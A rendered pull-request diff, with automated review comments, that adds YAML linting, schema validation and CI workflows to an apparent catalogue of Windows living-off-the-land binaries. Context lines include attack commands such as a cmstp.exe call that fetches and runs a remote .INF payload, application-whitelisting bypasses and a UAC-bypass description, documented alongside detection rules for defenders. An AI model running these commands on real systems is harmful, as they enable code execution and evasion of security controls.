Merge pull request #251 from xenoscr/master
YAML Linting & Schema Checks
This commit is contained in:
commit
5e55bcb82e
8
.github/.yamllint
vendored
8
.github/.yamllint
vendored
@ -4,12 +4,12 @@ yaml-files:
|
||||
- '*.yml'
|
||||
rules:
|
||||
new-line-at-end-of-file:
|
||||
level: warning
|
||||
level: error
|
||||
trailing-spaces:
|
||||
level: warning
|
||||
level: error
|
||||
line-length:
|
||||
level: warning
|
||||
new-lines:
|
||||
level: warning
|
||||
level: error
|
||||
indentation:
|
||||
level: warning
|
||||
level: error
|
||||
|
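Review bot: After this change `line-length` is the only rule left at `level: warning`, and the lint step in `.github/workflows/yaml-linting.yml` passes `no_warnings: true`, so line-length findings are never shown anywhere — either promote it to `level: error` with an explicit `max:` the existing files can meet, or drop the rule rather than carry one that cannot surface. Whether the file `extends: default` (which would bring in `truthy`, `document-start` and the rest at their default levels) is above the hunk and not visible here; the hunk covers lines 4–15 only.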
2
.github/workflows/gh-pages.yml
vendored
2
.github/workflows/gh-pages.yml
vendored
@ -16,7 +16,7 @@ jobs:
|
||||
|
||||
- name: Change .yml to .md
|
||||
run: |
|
||||
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
|
||||
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
|
||||
mv yml/OSBinaries yml/Binaries
|
||||
mv yml/OSLibraries yml/Libraries
|
||||
mv yml/OSScripts yml/Scripts
|
||||
|
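Review bot: The rewritten loop still iterates `$(find …)` output, so any path containing whitespace is split into separate words before `mv` sees it; a `find -exec` form avoids that: `find yml/ -name '*.yml' -exec sh -c 'echo "---" >> "$1" && mv "$1" "${1%.yml}.md"' sh {} \;`. The appended `---` also assumes every file already ends with a newline — otherwise it is glued onto the last value and the front matter never closes — and nothing in this job enforces that; `new-line-at-end-of-file` is raised to error in the same PR, but in a separate workflow that does not gate this one. A comment on the `run:` block stating why the delimiter is appended here (the source files no longer end in `---`) would spare the next reader a trip through the history. The step may continue past the end of the hunk.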
34
.github/workflows/yaml-linting.yml
vendored
34
.github/workflows/yaml-linting.yml
vendored
@ -1,19 +1,35 @@
|
||||
---
|
||||
name: YAML Lint
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
pull_request:
|
||||
branches:
|
||||
- master
|
||||
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
|
||||
on: [push,pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v1
|
||||
- uses: actions/checkout@v3
|
||||
- name: yaml-lint
|
||||
uses: ibiqlik/action-yamllint@v3
|
||||
with:
|
||||
no_warnings: true
|
||||
file_or_dir: yml/**/*.yml
|
||||
config_file: .github/.yamllint
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
|
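Review bot: All three third-party actions are referenced by mutable tags (`actions/checkout@v3`, `ibiqlik/action-yamllint@v3`, `cketti/action-pykwalify@v0.3-temp-fix`), the last being a tag on a personal fork whose name suggests a temporary state, and with `on: [push,pull_request]` the workflow now runs against every push and pull request with whatever those refs point to at the time. Pin each `uses:` to a full commit SHA with the tag kept as a trailing comment, e.g. `uses: cketti/action-pykwalify@<commit-sha>  # v0.3-temp-fix`, and add a top-level `permissions:` block (`permissions:` / `  contents: read`) so the job token is read-only regardless of repository defaults. The four pykwalify steps differ only in `files:`; a `strategy.matrix` over the four directories, or a single step if the action accepts several globs, would remove the repetition. `[push,pull_request]` also lacks the space after the comma that yamllint's `commas` rule flags — the workflow files are outside the linted tree, but keeping them consistent with the rules this PR enforces on `yml/` is cheap.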
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run yamllint
|
||||
uses: reviewdog/action-yamllint@v1
|
||||
with:
|
||||
level: error
|
||||
reporter: github-pr-review # Change reporter.
|
||||
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
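Review bot: `.github/yaml-lint-reviewdog.yml.bak` sits outside `.github/workflows/`, so GitHub never runs it, and it repeats the four pykwalify steps from `yaml-linting.yml` verbatim; the two copies will drift the next time a directory or schema path changes. If it is meant as a parked alternative, a leading comment saying so and why it was shelved (presumably the `github-pr-review` reporter needs a write token that `pull_request` runs from forks do not get — not verified here) would make that explicit; otherwise the content belongs in the PR description or git history rather than the tree. `reporter: github-pr-review # Change reporter.` also reads as a leftover from the action's sample rather than a decision.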
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Bart
|
||||
Handle: '@bartblaze'
|
||||
---
|
||||
|
@ -15,4 +15,3 @@ Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
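Review bot: The context line `Handle: '@@vysecurity'` remains on the new side, and the `Handle` pattern `'^(@(\w){1,15})?$'` that `YML-Schema.yml` introduces in this same PR does not accept a doubled `@`, so the pykwalify step should reject this file once the workflow runs, assuming it lives under one of the four validated directories. The fix is the one-character change `Handle: '@vysecurity'`, the same normalisation the PR applies to `'@grayfold3d'` elsewhere. The file name is not visible in this rendering.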
118
YML-Schema.yml
Normal file
118
YML-Schema.yml
Normal file
@ -0,0 +1,118 @@
|
||||
---
|
||||
type: map
|
||||
mapping:
|
||||
# Id field enhancement possibility commenting out for now
|
||||
# "Id":
|
||||
# type: str
|
||||
# required: true
|
||||
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
|
||||
"Name":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Aliases":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Alias":
|
||||
type: str
|
||||
required: false
|
||||
"Author":
|
||||
type: str
|
||||
required: true
|
||||
"Created":
|
||||
type: date
|
||||
required: true
|
||||
"Commands":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Command":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Usecase":
|
||||
type: str
|
||||
required: true
|
||||
"Category":
|
||||
type: str
|
||||
required: true
|
||||
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
|
||||
"Privileges":
|
||||
type: str
|
||||
required: true
|
||||
"MitreID":
|
||||
type: str
|
||||
required: true
|
||||
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
|
||||
"OperatingSystem":
|
||||
type: str
|
||||
required: true
|
||||
"Full_Path":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Path":
|
||||
type: str
|
||||
required: true
|
||||
"Code_Sample":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Code":
|
||||
type: str
|
||||
"Detection":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"IOC":
|
||||
type: str
|
||||
"Sigma":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Analysis":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Elastic":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Splunk":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"BlockRule":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Resources":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Link":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Acknowledgement":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Person":
|
||||
type: str
|
||||
"Handle":
|
||||
type: str
|
||||
pattern: '^(@(\w){1,15})?$'
|
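Review bot: The URL `pattern` used for `Sigma`, `Analysis`, `Elastic`, `Splunk`, `BlockRule` and `Link` contains the class `[$-_@.&+#]`, which Python's `re` (what pykwalify compiles with) reads as the range `$`–`_` (0x24–0x5F): that range is what makes `/`, `:`, `?` and `=` match at all, while also letting through `<`, `>`, `;`, `\` and `'`, so the check is far looser than it looks and only works by accident. A class that names the RFC 3986 characters explicitly is both tighter and honest about what it accepts: `pattern: '^https?://[\w.~:/?#\[\]@!$&''()*+,;=%-]+$'` (the `''` is YAML's escaped single quote). The same literal is repeated six times; defining it once with a YAML anchor (`pattern: &url_pattern '…'` on the first use, `pattern: *url_pattern` on the others) keeps the copies from drifting, since aliases are resolved by the loader before pykwalify sees the schema. The `Handle` pattern `'^(@(\w){1,15})?$'` matches an empty string but not a bare null, so the files in this PR that leave `Handle:` blank rely on pykwalify treating null as absent for a non-required key — worth confirming against the action's output.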
@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
|
||||
Commands:
|
||||
- Command: The command
|
||||
Description: Description of the command
|
||||
Aliases:
|
||||
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
|
||||
Usecase: A description of the usecase
|
||||
Category: Execute
|
||||
Privileges: Required privs
|
||||
|
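Review bot: The added `Aliases:` entry does not match the `"Aliases"` definition that `YML-Schema.yml` introduces in this same PR: the schema declares it as a sequence of maps keyed `Alias` (`- Alias: …`) and lists it between `Description` and `Author`, i.e. as a top-level field, whereas the template adds bare-string items (`- An alias for the command (…)`) between a command's `Description:` and `Usecase:`. A contributor who copies this block into a new entry would fail the pykwalify step, so one side should change — `- Alias: An alias for the binary (example: ProcDump64.exe)` at document level if the schema is the source of truth. Indentation is not preserved in this rendering, so the placement is inferred from the surrounding lines; the item-shape mismatch does not depend on it. The file name is not shown, but the hunk context (`Created: YYYY-MM-DD (…)`) indicates the template file.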
@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
||||
|
@ -23,7 +23,7 @@ Detection:
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
|
||||
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
||||
Acknowledgement:
|
||||
- Person: 'Freddie Barr-Smith'
|
||||
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||
@ -27,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -48,4 +48,3 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
|
@ -46,7 +46,7 @@ Detection:
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
Resources:
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
|
||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ensar Samil
|
||||
Handle: '@sblmsrsn'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: David Middlehurst
|
||||
Handle: '@dtmsecurity'
|
||||
---
|
||||
|
@ -75,4 +75,3 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Lior Adar
|
||||
---
|
||||
|
@ -21,8 +21,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||
@ -34,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: r0lan
|
||||
Handle: '@yeyint_mth'
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||
Resources:
|
||||
@ -24,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -14,15 +14,13 @@ Commands:
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||
@ -44,4 +42,3 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
|
@ -29,4 +29,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Wietze
|
||||
Handle: '@wietze'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Gal Kristal
|
||||
Handle: '@gal_kristal'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
||||
Handle: '@tim8288'
|
||||
- Person: Hai Vaknin
|
||||
Handle: '@vakninhai'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
|
@ -66,5 +66,4 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Mike Cary
|
||||
Handle: 'grayfold3d'
|
||||
---
|
||||
Handle: '@grayfold3d'
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Category: UAC Bypass
|
||||
Privileges: User
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@enigma0x3'
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -41,4 +41,3 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
||||
Handle: '@CyberRaiju'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description: Load a DLL located in the c:\test folder with a specific name.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -54,4 +54,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Tamir Yehuda
|
||||
Handle: '@tim8288'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description: Write to ADS, discover, or download files with Findstr.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -45,4 +45,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Acknowledgement:
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Carlos Perez
|
||||
Handle: '@Carlos_Perez'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Amit Serper
|
||||
Handle: '@0xAmit'
|
||||
---
|
||||
|
@ -176,4 +176,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jesus Galvez
|
||||
Handle:
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -17,6 +17,7 @@ Commands:
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10,7
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
@ -32,4 +33,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Lior Adar
|
||||
Handle:
|
||||
---
|
||||
|
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -39,4 +39,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@bohops'
|
||||
- Person: clem
|
||||
Handle: '@clavoillotte'
|
||||
---
|
||||
|
@ -53,4 +53,3 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
Usecase: Compile and run code
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -77,4 +77,3 @@ Acknowledgement:
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -14,7 +14,7 @@ Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
Usecase: Execute code bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
